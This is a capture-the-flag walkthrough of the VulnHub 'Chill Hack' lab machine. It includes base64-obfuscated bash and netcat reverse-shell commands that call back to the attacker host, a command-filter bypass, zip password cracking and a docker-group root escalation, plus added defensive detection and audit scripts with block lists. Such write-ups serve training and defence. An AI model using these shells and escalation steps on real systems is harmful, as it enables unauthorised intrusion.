Chill Hack
Author: jason_huawen
Target machine information
Name: Chill Hack: 1
URL:
https://www.vulnhub.com/entry/chill-hack-1,622/
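Identifying the target host's IP address
The target host could not obtain an IP address automatically, so I resolved this by following another article of mine.
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]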
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:fb:7c:2e 1 60 PCS Systemtechnik GmbH
192.168.56.205 08:00:27:d5:5f:8d 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.205.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.205 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-30 05:58 EST
Nmap scan report for 192.168.56.205
Host is up (0.000089s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.206
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09f95db918d0b23a822d6e768cc20144 (RSA)
| 256 1bcf3a498b1b20b02c6aa551a88f1e62 (ECDSA)
|_ 256 3005cc52c66f6504860f7241c8a439cf (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Game Info
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:D5:5F:8D (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.79 seconds
The NMAP scan shows that the target host has 3 open ports: 21 (FTP), 22 (SSH), and 80 (HTTP).
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ftp 192.168.56.205
Connected to 192.168.56.205.
220 (vsFTPd 3.0.3)
Name (192.168.56.205:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alh
229 Entering Extended Passive Mode (|||10801|)
150 Here comes the directory listing.
drwxr-xr-x 2 0 115 4096 Oct 03 2020 .
drwxr-xr-x 2 0 115 4096 Oct 03 2020 ..
-rw-r--r-- 1 1001 1001 90 Oct 03 2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||42392|)
150 Opening BINARY mode data connection for note.txt (90 bytes).
100% |********************************************************************************| 90 98.09 KiB/s 00:00 ETA
226 Transfer complete.
90 bytes received in 00:00 (65.44 KiB/s)
ftp> put test.txt
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||55210|)
550 Permission denied.
ftp> quit
221 Goodbye.
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ searchsploit vsFTPd 3.0.3
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
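- The target host's FTP service allows anonymous access
- Anonymous users are not allowed to upload files
- The FTP service has no exploitable vulnerability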
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat note.txt
Anurodh told me that there is some filtering on strings being put in the command -- Apaar
- Commands are filtered
- Usernames: Anurodh, Apaar
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ curl http://192.168.56.205/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.205 Port 80</address>
</body></html>
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ nikto -h http://192.168.56.205
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.205
+ Target Hostname: 192.168.56.205
+ Target Port: 80
+ Start Time: 2023-01-30 06:12:34 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Server may leak inodes via ETags, header found with file /, inode: 8970, size: 56d7e303a7e80, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /css/: Directory indexing found.
+ OSVDB-3092: /css/: This might be interesting...
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time: 2023-01-30 06:13:26 (GMT-5) (52 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
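The scan reveals the /secret directory, where commands can be executed; a filter is clearly in place (consistent with the note.txt file obtained earlier).
Base64-encoding the command easily bypasses the filter:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]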
└─$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+JjEK
Run the following command on the /secret/ page:
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+JjEK | base64 -d |bash
The reverse shell from the target host arrives on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.205] 40494
bash: cannot set terminal process group (1308): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/secret$
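The bypass above works because the filter only looks at the raw input string. As an added example (not part of the original write-up, and not the target's actual filter), the following detection decodes base64-looking tokens before applying a keyword check and also flags decoder-to-shell pipelines; the function name `is_suspicious` and the keyword set `BLOCKED` are assumptions.

```sh
#!/bin/sh
# Added example: catch commands that hide blocked strings behind base64.
# Meant as a layer on top of a raw keyword filter; BLOCKED is an assumed set.

BLOCKED='/dev/(tcp|udp)/|bash|[[:space:]]nc[[:space:]]'

# is_suspicious CMD -> exit 0 if CMD should be rejected or alerted on, else 1.
is_suspicious() {
  cmd=$1
  # Rule 1: output of a base64 decoder piped straight into a shell.
  if printf '%s\n' "$cmd" | LC_ALL=C grep -Eq \
      'base64[[:space:]]+(-d|--decode)[^|]*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)'; then
    return 0
  fi
  # Rule 2: decode every base64-looking token and run the keyword check on
  # the decoded bytes, which a raw-string filter never sees.
  for tok in $(printf '%s\n' "$cmd" | LC_ALL=C grep -Eo '[A-Za-z0-9+/]{16,}={0,2}'); do
    if printf '%s' "$tok" | base64 -d 2>/dev/null | LC_ALL=C grep -aEq "$BLOCKED"; then
      return 0
    fi
  done
  return 1
}

# Sample inputs: two constructed benign commands, then the command from the
# write-up above.
for sample in \
  'ls -la /var/www/html' \
  'echo aGVsbG8gd29ybGQsIGhlbGxvIHdvcmxk' \
  'echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjU2LjIwNi81NTU1IDA+JjEK | base64 -d |bash'
do
  if is_suspicious "$sample"; then verdict=BLOCK; else verdict=allow; fi
  printf '%-6s %s\n' "$verdict" "$sample"
done
```

Keyword matching of any kind remains a weak control; the durable fix is for the page not to pass user input to a shell at all.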
Privilege escalation
Upload the linpeas.sh script to the /tmp directory on the target host, make it executable, and run it. Part of the output:
╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
jason;/bin/bash
id
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
Thank you for your precious time!
www-data@ubuntu:/tmp$
In other words, command injection can be used to obtain another shell, this time as the user apaar.
www-data@ubuntu:/tmp$ sudo -u apaar /home/apaar/.helpline.sh
sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
jason;/bin/bash
nc -e /bin/bash 192.168.56.206 6666;
Thank you for your precious time!
However, no reverse shell came back, so this path does not work.
A closer look through the directories turns up the file hacker.php:
www-data@ubuntu:/var/www/files$ cat hacker.php
cat hacker.php
<html>
<head>
<body>
<style>
body {
background-image: url('images/002d7e638fb463fb7a266f5ffc7ac47d.gif');
}
h2
{
color:red;
font-weight: bold;
}
h1
{
color: yellow;
font-weight: bold;
}
</style>
<center>
<img src = "images/hacker-with-laptop_23-2147985341.jpg"><br>
<h1 style="background-color:red;">You have reached this far. </h2>
<h1 style="background-color:black;">Look in the dark! You will find your answer</h1>
</center>
</head>
</html>
www-data@ubuntu:/var/www/files$
Download the image to the local Kali Linux machine:
www-data@ubuntu:/var/www/files$ cd images
cd images
www-data@ubuntu:/var/www/files/images$ ls -alh
ls -alh
total 2.1M
drwxr-xr-x 2 root root 4.0K Oct 3 2020 .
drwxr-xr-x 3 root root 4.0K Oct 3 2020 ..
-rw-r--r-- 1 root root 2.0M Oct 3 2020 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rw-r--r-- 1 root root 68K Oct 3 2020 hacker-with-laptop_23-2147985341.jpg
www-data@ubuntu:/var/www/files/images$ which python
which python
www-data@ubuntu:/var/www/files/images$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/var/www/files/images$ python3 -m http.server
python3 -m http.server
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ wget http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
--2023-01-30 06:47:47-- http://192.168.56.205:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 192.168.56.205:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’
hacker-with-laptop_23-214798534 100%[=====================================================>] 67.23K --.-KB/s in 0.001s
2023-01-30 06:47:47 (48.6 MB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls
hacker-with-laptop_23-2147985341.jpg linpeas.sh nmap_full_scan note.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ stegseek hacker-with-laptop_23-2147985341.jpg
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "backup.zip".
[i] Extracting to "hacker-with-laptop_23-2147985341.jpg.out".
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls -alh
total 836K
drwxr-xr-x 2 kali kali 4.0K Jan 30 06:48 .
drwxr-xr-x 30 kali kali 4.0K Jan 30 05:50 ..
-rw-r--r-- 1 kali kali 68K Oct 3 2020 hacker-with-laptop_23-2147985341.jpg
-rw-r--r-- 1 kali kali 750 Jan 30 06:48 hacker-with-laptop_23-2147985341.jpg.out
-rw-r--r-- 1 kali kali 748K Jan 30 06:26 linpeas.sh
-rw-r--r-- 1 root root 1.5K Jan 30 05:58 nmap_full_scan
-rw-r--r-- 1 kali kali 90 Oct 3 2020 note.txt
-rw-r--r-- 1 kali kali 0 Jan 30 06:01 test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat hacker-with-laptop_23-2147985341.jpg.out
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ file hacker-with-laptop_23-2147985341.jpg.out
hacker-with-laptop_23-2147985341.jpg.out: Zip archive data, at least v2.0 to extract, compression method=deflate
The zip archive turns out to be encrypted:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out
Archive: hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ zip2john hacker-with-laptop_23-2147985341.jpg.out > hashes
ver 2.0 efh 5455 efh 7875 hacker-with-laptop_23-2147985341.jpg.out/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word (hacker-with-laptop_23-2147985341.jpg.out/source_code.php)
1g 0:00:00:00 DONE (2023-01-30 06:52) 25.00g/s 307200p/s 307200c/s 307200C/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ unzip hacker-with-laptop_23-2147985341.jpg.out
Archive: hacker-with-laptop_23-2147985341.jpg.out
[hacker-with-laptop_23-2147985341.jpg.out] source_code.php password:
inflating: source_code.php
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ ls
hacker-with-laptop_23-2147985341.jpg hashes nmap_full_scan source_code.php
hacker-with-laptop_23-2147985341.jpg.out linpeas.sh note.txt test.txt
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ cat source_code.php
<html>
<head>
Admin Portal
</head>
<title> Site Under Development ... </title>
<body>
<form method="POST">
Username: <input type="text" name="name" placeholder="username"><br><br>
Email: <input type="email" name="email" placeholder="email"><br><br>
Password: <input type="password" name="password" placeholder="password">
<input type="submit" name="submit" value="Submit">
</form>
<?php
if(isset($_POST['submit']))
{
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
{
$random = rand(1000,9999);?><br><br><br>
<form method="POST">
Enter the OTP: <input type="number" name="otp">
<input type="submit" name="submitOtp" value="Submit">
</form>
<?php mail($email,"OTP for authentication",$random);
if(isset($_POST["submitOtp"]))
{
$otp = $_POST["otp"];
if($otp == $random)
{
echo "Welcome Anurodh!";
header("Location: authenticated.php");
}
else
{
echo "Invalid OTP";
}
}
}
else
{
echo "Invalid Username or Password";
}
}
?>
</html>
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$ echo 'IWQwbnRLbjB3bVlwQHNzdzByZA==' | base64 -d
!d0ntKn0wmYp@ssw0rd
┌──(kali㉿kali)-[~/Vulnhub/Chill_Hack]
└─$
This is probably some user's password, so try it:
www-data@ubuntu:/home$ su apaar
su apaar
su: must be run from a terminal
www-data@ubuntu:/home$ which python3
which python3
/usr/bin/python3
www-data@ubuntu:/home$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/home$ su - apaar
su - apaar
Password: !d0ntKn0wmYp@ssw0rd
su: Authentication failure
www-data@ubuntu:/home$ su - anurodh
su - anurodh
Password: !d0ntKn0wmYp@ssw0rd
anurodh@ubuntu:~$
Switching to the user anurodh succeeds.
anurodh@ubuntu:~$ sudo -u apaar /home/apaar/.helpline.sh
Welcome to helpdesk. Feel free to talk to anyone at any time!
Enter the person whom you want to talk with: jason
Hello user! I am jason, Please enter your message: cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
Thank you for your precious time!
anurodh@ubuntu:~$
anurodh@ubuntu:/tmp$ wget http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
--2023-01-30 20:02:31-- http://192.168.56.206:8000/alpine-v3.13-x86_64-20210218_0139.tar.gz
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3259593 (3.1M) [application/gzip]
Saving to: ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’
alpine-v3.13-x86_64-20210218_01 100%[=====================================================>] 3.11M --.-KB/s in 0.01s
2023-01-30 20:02:31 (316 MB/s) - ‘alpine-v3.13-x86_64-20210218_0139.tar.gz’ saved [3259593/3259593]
anurodh@ubuntu:/tmp$ ls
alpine-v3.13-x86_64-20210218_0139.tar.gz
systemd-private-cd83df7cbc904717a343517ce0048a1b-apache2.service-dQSd3y
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-resolved.service-pl5JTK
systemd-private-cd83df7cbc904717a343517ce0048a1b-systemd-timesyncd.service-szZW26
anurodh@ubuntu:/tmp$
Escalate to root by exploiting the fact that anurodh is a member of the docker group:
anurodh@ubuntu:/tmp$ docker images
REPOSITORY TAG IMAGE ID CREATED SIZE
alpine latest a24bb4013296 2 years ago 5.57MB
hello-world latest bf756fb1ae65 3 years ago 13.3kB
anurodh@ubuntu:/tmp$ docker run -v /:/mnt -it alpine
/ # cd /mnt
/mnt # ls -alh
total 2G
drwxr-xr-x 24 root root 4.0K Oct 3 2020 .
drwxr-xr-x 1 root root 4.0K Jan 30 20:05 ..
drwxr-xr-x 2 root root 4.0K Oct 3 2020 bin
drwxr-xr-x 4 root root 4.0K Oct 3 2020 boot
drwxr-xr-x 2 root root 4.0K Oct 3 2020 cdrom
drwxr-xr-x 19 root root 3.8K Jan 30 18:56 dev
drwxr-xr-x 97 root root 4.0K Oct 4 2020 etc
drwxr-xr-x 5 root root 4.0K Oct 3 2020 home
lrwxrwxrwx 1 root root 34 Oct 3 2020 initrd.img -> boot/initrd.img-4.15.0-118-generic
lrwxrwxrwx 1 root root 34 Oct 3 2020 initrd.img.old -> boot/initrd.img-4.15.0-118-generic
drwxr-xr-x 22 root root 4.0K Oct 3 2020 lib
drwxr-xr-x 2 root root 4.0K Aug 6 2020 lib64
drwx------ 2 root root 16.0K Oct 3 2020 lost+found
drwxr-xr-x 2 root root 4.0K Aug 6 2020 media
drwxr-xr-x 2 root root 4.0K Aug 6 2020 mnt
drwxr-xr-x 3 root root 4.0K Oct 3 2020 opt
dr-xr-xr-x 197 root root 0 Jan 30 10:56 proc
drwx------ 7 root root 4.0K Jan 30 18:54 root
drwxr-xr-x 30 root root 1000 Jan 30 19:58 run
drwxr-xr-x 2 root root 12.0K Oct 3 2020 sbin
drwxr-xr-x 2 root root 4.0K Oct 3 2020 snap
drwxr-xr-x 3 root root 4.0K Oct 3 2020 srv
-rw------- 1 root root 2.0G Oct 3 2020 swap.img
dr-xr-xr-x 13 root root 0 Jan 30 18:56 sys
drwxrwxrwt 10 root root 4.0K Jan 30 20:05 tmp
drwxr-xr-x 11 root root 4.0K Oct 3 2020 usr
drwxr-xr-x 14 root root 4.0K Oct 3 2020 var
lrwxrwxrwx 1 root root 31 Oct 3 2020 vmlinuz -> boot/vmlinuz-4.15.0-118-generic
lrwxrwxrwx 1 root root 31 Oct 3 2020 vmlinuz.old -> boot/vmlinuz-4.15.0-118-generic
/mnt # cd root
/mnt/root # ls -alh
total 72K
drwx------ 7 root root 4.0K Jan 30 18:54 .
drwxr-xr-x 24 root root 4.0K Oct 3 2020 ..
-rw------- 1 root root 0 Oct 4 2020 .bash_history
-rw-r--r-- 1 root root 3.0K Apr 9 2018 .bashrc
drwx------ 2 root root 4.0K Oct 3 2020 .cache
drwx------ 3 root root 4.0K Oct 3 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Jan 30 18:54 .local
-rw------- 1 root root 370 Oct 4 2020 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 12.0K Oct 4 2020 .proof.txt.swp
drwx------ 2 root root 4.0K Oct 3 2020 .ssh
drwxr-xr-x 2 root root 4.0K Oct 3 2020 .vim
-rw------- 1 root root 11.4K Oct 4 2020 .viminfo
-rw-r--r-- 1 root root 166 Oct 3 2020 .wget-hsts
-rw-r--r-- 1 root root 1.4K Oct 4 2020 proof.txt
/mnt/root # cat proof.txt
{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}
Congratulations! You have successfully completed the challenge.
,-.-. ,----. _,.---._ .-._ ,----.
,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \
|, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-`
|- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-.
\, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , /
| - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-'
\ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._
|- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , /
`--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----``
--------------------------------------------Designed By -------------------------------------------------------
| Anurodh Acharya |
---------------------
Let me know if you liked it.
Twitter
- @acharya_anurodh
Linkedin
- www.linkedin.com/in/anurodh-acharya-b1937116a
/mnt/root #
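Both privilege-escalation steps above come from configuration: a NOPASSWD sudo rule pointing at a script in a home directory, and an ordinary user in the docker group. As an added example (not part of the original write-up), the audit below flags both conditions; the sample group and sudoers lines are constructed (the docker GID and the `backup` rule are assumptions), and the path check is a heuristic.

```sh
#!/bin/sh
# Added example: audit for the two misconfigurations abused in this write-up.
# Sample data is constructed; on a real host pass /etc/group and the sudoers
# files to the functions instead.

# Members of the docker group can bind-mount / into a container, which makes
# the group root-equivalent.
docker_group_members() {
  awk -F: '$1 == "docker" && $4 != "" { gsub(",", "\n", $4); print $4 }' "$1"
}

# NOPASSWD rules whose command sits in a location an unprivileged user may
# control (home directories and world-writable temp directories).
risky_sudo_rules() {
  awk '
    /^[[:space:]]*#/ { next }
    /NOPASSWD:/ {
      who = $1
      cmds = $0
      sub(/.*NOPASSWD:[[:space:]]*/, "", cmds)
      n = split(cmds, c, /[[:space:]]*,[[:space:]]*/)
      for (i = 1; i <= n; i++) {
        split(c[i], w, /[[:space:]]+/)
        if (w[1] ~ /^\/(home|tmp|var\/tmp|dev\/shm)\//) print who, w[1]
      }
    }' "$1"
}

# Write the constructed sample files into directory $1.
write_samples() {
  cat > "$1/group" <<'EOF'
root:x:0:
docker:x:999:anurodh
apaar:x:1001:
EOF
  cat > "$1/sudoers" <<'EOF'
# constructed lines; the first mirrors the sudo -l output shown earlier
www-data ALL=(apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
backup ALL=(root) NOPASSWD: /usr/bin/rsync
%sudo ALL=(ALL:ALL) ALL
EOF
}

dir=$(mktemp -d)
write_samples "$dir"
echo "docker group members (root-equivalent):"
docker_group_members "$dir/group"
echo "NOPASSWD rules on user-controllable paths:"
risky_sudo_rules "$dir/sudoers"
rm -rf "$dir"
```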
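Lessons learned
- The .helpline.sh script has some problems when run in the shell obtained through the reverse shell; in that situation, consider whether there is another route.
- Once a user's password is obtained, log in over SSH promptly; that shell is more stable.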